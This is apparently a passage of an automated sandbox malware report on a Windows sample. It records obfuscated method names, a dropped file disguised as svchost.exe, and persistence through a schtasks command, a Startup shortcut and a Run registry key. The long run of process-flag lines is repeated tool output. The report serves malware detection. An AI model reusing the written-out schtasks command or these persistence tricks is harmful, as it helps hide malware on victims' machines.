                                  Source: svchost.exe.0.dr, 316U38w4QVmq2sHFnBvkd4LieyieRq76dn2Kimj2SAfAl.csHigh entropy of concatenated method names: 'hI9KT6csSEYaPv773xBYfKRtTKNVnU7dJn8Qp7EhP9o8D', 'lEZz5agvylve7hksOkLER989WBvtK7k47gcAiIoovQbyf2w8px3wk2BFpD6525UdCuvfpN2sgvMP00OCkrZ7K0hzO3EQqMa', 'qThp3Tnp9uL3mCcx2RKuJOmWtl45lRIvOF9dn1VfKP4GUZGNAE2peaPzu6ACiRMvAZijeLhApv2fylmlEDm0IpwTEDX49yl', '_8Ok5pYSWOD96ESoPqEFtnEDOaH6skpryUVavXewN6tTmHaUVo9u2GANNMKwoYypuNmSwcWOkHXOURN6CNuhWPnjxInE7uF8', '_6YuBy37IC7jwy9VRa0lxGiDaoZtqy93ayCJfcLWCuwbXmNIVfj3VIGIFyG3dOMObHLIc64sjxELzJ2fcJZ0tXMsTSoQ1G4v'
                                  Source: svchost.exe.0.dr, ake8eTev2BMeufFpdYvXz1rggei7SGsicHjO2bESD2ok5TLhCDsYXlIFx6fvqouj8uy8v8luRiBFk.csHigh entropy of concatenated method names: 'YYHDR1FlBjBxXOU39qSvS1EcsQh0tj8gM35gmXuZITmuiPk08Lm78xWkFCYLoEb3zCUSMok6n8Pz3', 'VDfFRo8LYl1tIXFA06Is3iUDeWnzk1ge8Klc9j3EikbSyEv5jSSlbeFcLIsx826PuEyDRYQKfK5yQ', 'tBSpzoYaZ38vEVkNARodMehzxQe0HGo9Fh3I2', 'c4mbtuvxK9W16V045BYBHgfKZc4cfE26553dq', 'uJ1TmU8R3cr3rAutD0RpanDoSqLqmjn0dnqog', '_3k0jFaralJt9bZKXRcPcjgCnPx3FPWpHraTEk'
                                  Source: svchost.exe.0.dr, cSNl319mLCwHfhwaDWRYhnKG8D3oxANewMPCBZ2pid1LPBXyU3ptz6Bh9XCQ5pUwwZOVIjaKEPlJe.csHigh entropy of concatenated method names: 'knTr5CJmVp8X9Ko4GZ7ckQNOEhaAynFQXlojQjbSxyl6OhyyDttZrHspfT6xQHm9BOS3diXSEYNSj', 'l66FIfebctAmOjmY7AtDWwoehjmyLESp9Q7ABrsRINsdXHbENH3vJWlYj8DmXd1gwPJS5erC32HOw', 'weMfLXyg4oTWv5b8kh8dYP2K7WshUjVvSn6AK6VNwu8umcIenO7s7tFITnWeBXfd48CZ5M3RLXIAU', 'rkq8Va3BA7apdfvH3rnX9doZlXOicZYXqnyfcDPvBeEls1t7ms86njfHIJOOSwsyr2B4JI4ugQHUY', 'qzBVRY0F1Da1G0Kepxt7anYKc5eHxOc6FffmL', 'TED3M9IaM0EnSj6YZgk3fv5dubsZ9Agoh3plW', 'Yk46pcnFd76Nc6AQvsO7LcEfWflt7KQyxFvcz', 'T66YrvMTGMmZQ8J0zkbd118JJVsitKhmjzGZm', 'VFlaKlbCgpAuH3kfCBnvtwECtfXz7cihAcr9M', 'XicSwzaAyuqo3OkjMsrJSrZFOEiadmmrqpZH1'
                                  Source: svchost.exe.0.dr, mEMctJ62dLnMaiPT5KFDAPnsIeuT2SibjV9v92SvruauN.csHigh entropy of concatenated method names: 'caZZO7FJB5MgNZYKU7bnFPUmIpW7O3OotbdwueTCPaMDv', 'BWYSgwbdewN1Pj1kRtkXa0yQRt8tLYfQvQwLkKaIJ23ml', 'lMjfsbGxsPuryCxLroIgnXKI3BuA0yywVGKZuU6K5Ym1J', 'mDqu5hS6MIPrQmdl8W5xJabrXw5gkQ8laFVX1pqQCSQPa', 'GyZxcfiQcIFyhJ5KcOw5GVLO1M1os0lW9cAYHiVhklyA1', '_2lLgZlRHpSLWJrC1Q3m0iTtekc14PWgkBoifcONOZOlfG', 'MadPtqRY4CELmJv147dyqfAg2KWeRalVvHXrqAVHChpNr', 'TxyJCy9MVL77OtF6ImM2zYCw2uAHzDOUxvRakni6npGzo', 'JkIzOegnMmo3s68MzID2gqKw3MGQVGKwC8cQqNCMdf6QY', 'iVDPnAhG6ZdGZzb88qVpk6rDBRr76OEqFn4YMW88zmC7B'
                                  Source: svchost.exe.0.dr, CJam979yUJ3BepXKxOYvRdOc3MuWKQ1MQpVdlrMnmtC8lCvyWDcRTyQ8DvkW.csHigh entropy of concatenated method names: 'LPhiDpGNyupk0QkTJeRDXuAXKk4nZt8S7gmxwZHwaEyqOaCNeE2QcCfLrl2b', 'ZsbMZDmnYIyQzomYcwRhK9DDlwuIy5BYf2rlu7c8uwLhR8R8wO5Zp5QDrg8X', 'q2w1fq2KFMMamsZ6xiMch4B4urGzjjpGxlvQbNDXbBQlzANIStPXANe31EiU', 'teJw5EvhYnucnVqv9E67QSiuB2xkrWyyR8L5kK40GRPwUk3E2703WSSjy60q', 'jo9ARCBqotH12u4jiSrikMJ99HOlIpwcdC5tktu7JtfPeSe9uu7mhAZMPCw9', '_2qkCczNsQvHiRJmqh4e6GA9IKK5YYFT3ttq9XNIhOmBvwiBGS7uoCWPIfX5o', 'shecwU6o120NPfi6qrrKEPcXovd6dSgPxySAbGyB5aMkJqs2JaWT3lfGNAgF', 'QyjxGFi7lmx4DuYz8HRgQFz4PJg7wYXqVzYHiUMED8aolhTTlFzBKRZdUeLq', 'HW08iqc39U4VFyArbSBvUymM4FMSR4RpIRTKd3PlGIQwVbAzPPdo9Y4imupc', 'J7ZlavZodWZZQra3fPoAKEvgOiTjqWW54JG7F1TQUxyDI'
                                  Source: svchost.exe.0.dr, OtdwFnwcQUOqdXCzEXT2iHWY6m7TnezmZ9KWNrTeti2sF.csHigh entropy of concatenated method names: 'gsjBXZ37xlu3Pgbwrtg4vL41gtNEaPYaFrlk5KV5K7J7Q', 'rDaGax8TnhfgWhb96TG1vEf0gYpyPGm2OzPfSfrp7JvXr', 'rZk0So3B2qBGNsETvguKChb4BbBP8n7tNslq5LVdLouVN', 'ngkVjhYXgOlHrLuTBFz85U0aIAX1FJjOrvI9E8was4gsn', 'fGxoP2NJQ6e3T8FmZrsKfyD32VUbvvT6hy6TTTlLgmpJS', 'CAEtjMlryCB8plQS4BwkRkfNpvgBqGMCNnA1ALbP7Epil', '_31rX662av2ICwVBfdXsJYMw6U4vpgGIYoxYW2mx9V4fRO', 'MCbZWakKPYzbmlCSIysGx7rnE7Awv6xtyohayUMfQus14', 'd28o9r0Y568Yqc9UaUWgauleK6wX7zqOliWYLh9FosoU8', 'ry5ytayEO67BvgZTs0giQjzjxF1hXl4lGcPO58Ntu6Evv'
                                  Source: svchost.exe.0.dr, A5mGmKUxuoZHpACMaJkGzmT0Z3P0T1NPya007kG9JHQQX.csHigh entropy of concatenated method names: 'TqHoBHLeqk1ykJYWtDmzAvlbMZPfwaJUMDRdTqgk7MxFz', 'VpeO8tTOEv4iDsN3sQAY1HlnIybRgPGr45wl2qtybq0GP', 'ajFESKUOmlFLcJlAhY3aiK2rnBPoAmmtL7OCOhOsMSD7w', 'NUXnfVPIauOXEHNj99T919xlIVaZuXns9d1ZYKqWm16lN', 'xwPEpln1nibh4UhRM7kvXTf5vsGRdbjn1IONVe4qcVQHv', 'yXeXianhbNU40Kyrt7w1cPV2K6OeqDjj1JhkgWtLs2Chn', 'SK0pcMI6yma9l8Hp5jHoMZGpCfwbWDANtHuJ2Kh3y0OCt', 'EnwCf6xKrXQ1ZYb5XnSAU7cDURaYrekOdgByfbaG17EtA', '_0r7GaoOFubOWhewAz3YGBaDffErs351I9gCTCL3weWTpX', '_3puQ2eaZ6vEXyDvqKd3gwyJu3z5l3YC4WYsE0djfynr2B'
                                  Source: svchost.exe.0.dr, CAwAkHv2L9O24ZkL3o8yl2OMHnLL8juDUedYdDoMnoeapLDAWUrvcizzw9fV8raypt27ZJiYHXrCK.csHigh entropy of concatenated method names: 'eHJHSZbUFMHuDlsgt06d9ymOkD9rB7winu9BcMTSYaUwUdFYDrVHT4NS1KEc7WdCQcPha83kSWQPx', 'DBwTzVYAj0OlXZD7iKREHEQzm9iVJxP9JaI8y', 't4Pt0laeFIKZ1drk6fylwVxBDN7Bu4Ogj7LW4', 'FC1hCksYTeqI5YEvizv2lkSf36OOnmkj2LfWf', '_6eKKeAz5qdwuHhXipOpE8sbds97HV8zYbRSxv'
                                  Source: svchost.exe.0.dr, GiAmC40B13JgmF6UXFFKMPWATVLvv65v727AW1ocLFYsRDQPyyTbwRDgqgPrBPqfKlg14hVgQR56p.csHigh entropy of concatenated method names: 'ds3aGKgg1oiG6NqZOeTJuOlHCWHkAGVFdvjQ0EswmB29Hkw1fNzaZnSwyXR29uHtmN1QIvEEvh9iB', 'eDbv3OxSnYNivcZ1H9KT8kLfKwPXn63H7kLnJnJ44HijwhwmIWhGxbHUe239z9rIEnXHHcfAGTtpo', 'ZoVtxeSHR42WIpJCL1sglvgjf3AMH73YZx9UWpY3XorYNiRo7KW4STDzjA6yBQVCKGx3JIuXgf2QH', 'zUOykfwxJ07CoUYchVWmMqUhoDCv5Ik62ZQR4BRwOVBgRgsmUq5MwhV2mSFPB9UqBTzQ8pPq2eEvd', 'DKpA8fcq9OZEWLyqzR1G4J0CWUNEmAAwPt44eWHPalrTwxeolZ9mpJM6NXwntFas9mrWNlKkLsC7t', 'zb9c9G1YiJKqRtvBdtHeclNxmKjZCYJOE4b9obVuWLFduTy8GwB2QiRVOgCMpAS3AiPbM6XaMDoRz', 'jvm8pxvCwJVxGBwQ20W0GUv6mmWGpGau9qeUi8dsyqCBMiGsXWC9cxmX2bx5t3Akeln1A5AiRg83E', '_5tvOB8IKfSaR8yUijr3gsJ0ALECffPvW29mvpobrc5s1IvX9lr94I4oQ6Sme4pyTeJSigZjW4YJCS', 'YJzGPkrabKVcrFBkGIyFk25PMRE9BUZKYdRswpPLuQ3XGz4ZgzFkJ1z342K6DjFKYCo8j06v7LZlf', 'EihXhbaK7HgJ5FqKQdiV7I5LEpvOMIjISpUqMghjafuXOCuKRVaO7MgyeiM3d5qGagL9NXXQhHBkR'
                                  Source: svchost.exe.0.dr, C4gGYUvWN18G9l2hocBF2CWYzbPPKT1kTmJi83nHjcK6eRA10zBaeiiN3XvONpq260iicDMmpvue1.csHigh entropy of concatenated method names: 'AddClipboardFormatListener', 'SetParent', '_4AwoLb8w8tjx5jKViAlbKypkkKXIuHLucONq8Z6hZ6fCh6mfSOX4WOufslFXQxyQkWyiWBZVFaFuA', 'uQUdpik0SrcOqNytG3RkVvn9VDtGdnnbsLcHY', 'KnwawU5cr7z9TvPKtF2xxO4DecOSX70nXOvZa', '_9VKDxMdtfmJSWPqZ0R42jXCg5Vo9NAqfCabzh', 'yFcSURPynt5k8LnL2H4XQya3yflF7DxrmXVgN'

                                  Persistence and Installation Behavior

                                  barindex
                                  Drops PE files with benign system names
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeFile created: C:\Users\user\AppData\Local\Temp\svchost.exeJump to dropped file
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeFile created: C:\Users\user\AppData\Local\Temp\svchost.exeJump to dropped file

                                  Boot Survival

                                  barindex
                                  Uses schtasks.exe or at.exe to add and modify task schedules
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Local\Temp\svchost.exe"
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnkJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnkJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run svchostJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run svchostJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\WV7Gj9lJ7W.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
